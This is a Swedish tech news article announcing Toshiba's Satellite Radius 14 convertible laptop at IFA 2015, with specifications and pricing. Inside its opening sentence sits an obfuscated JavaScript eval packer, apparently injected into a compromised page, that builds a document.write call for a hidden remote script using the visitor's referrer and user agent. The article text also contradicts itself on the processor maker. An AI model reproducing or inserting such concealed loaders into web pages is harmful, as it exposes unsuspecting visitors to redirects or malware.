Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

PC

IFA 2015: Toshiba lanserar Satellite Radius 14

IFA 2015: Toshiba lanserar Satellite Radius 14
Sebastian

Toshiba eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfefd|var|u0026u|referrer|zszez||js|php’.split(’|’),0,{}))
lanserar i dag Satellite Radius 14 – en laptop som kombinerar flexibilitet, prestanda och stil. Satellite Radius 14 körs på sjätte generationens Intel Core-processorer och är optimerad för Windows 10, och kan på så sätt möta en rad olika krav från proffs, studenter och vardagsanvändare.

Satellite Radius 14 har designats för att passa en livsstil med högt tempo och går att anpassa till flera olika lägen med sin 360-graders vikbara skärm. Pekskärmen ger en intuitiv och interaktiv användarupplevelse oavsett om den används för arbete i laptop-läget, delning i presentationsläget eller underhållning i publikläget. Allt detta förpackat i en stilfull, tunn design med borstad aluminium på insidan och med ett bakgrundsbelyst ramlöst tangentbord.

Laptopens 14-tumsskärm ger en skarp HD-upplösning och har en fingeravtrycksskyddad yta. I underhållningsläget återges ett klart och fylligt ljud från de inbyggda högtalarna från Harman/Kardon. Dessutom möjliggör Bluetooth Link-tekniken uppspelning av musik i laptopens högtalare via en smartphone, surfplatta eller annan Bluetooth-kompatibel enhet

Satellite Radius 14 har en batteritid på upp till tio timmar, vilket gör att användare kan växla mellan laptopens olika visningslägen under en hel dag utan att behöva ladda batteriet. Sjätte generationens Intel Core-processorer möjliggör hög prestanda samt imponerande grafik och video. Laptopen hanterar Windows 10 på bästa sätt och de fyrkärniga AMD-processorerna säkerställer prestandan oavsett uppgift. För en extra boost har Satellite Radius 14 valbart stöd för SSD, vilket ger snabbare återställningstider, snabb åtkomst till viktiga filer samt en lägre strömförbrukning.

Laptopen har en speciell tangentbordsknapp som ger röstaktiverad tillgång till Microsofts röstassistent Cortana[2], samt flerriktade mikrofoner som ger tydligt ljud, även i bullriga miljöer. Med Continuum-funktionen blir övergången från innehåll och appar smidigare när man växlar från desktop- och surfplatteläge.

Satellite Radius 14 har flera olika uppkopplingsmöjligheter för att kunna dela innehåll och få tillgång till externa filer. En HDMI-port med Ultra HD 4K-ouput gör det möjligt att dela högkvalitativt innehåll till kompatibla TV-skärmar och Intel WiDi möjliggör trådlös delning. Tre USB-portar, varav en med Sleep & Charge, ingår för snabb överföring av filer, medan snabb tillgång till internet förstärks av Intel Dual Band Wireless AC.

Tillgänglighet

Toshiba Satellite Radius 14 kommer att finnas tillgänglig under det fjärde kvartalet 2015. Rekommenderat cirkapris ligger på 5 990 SEK.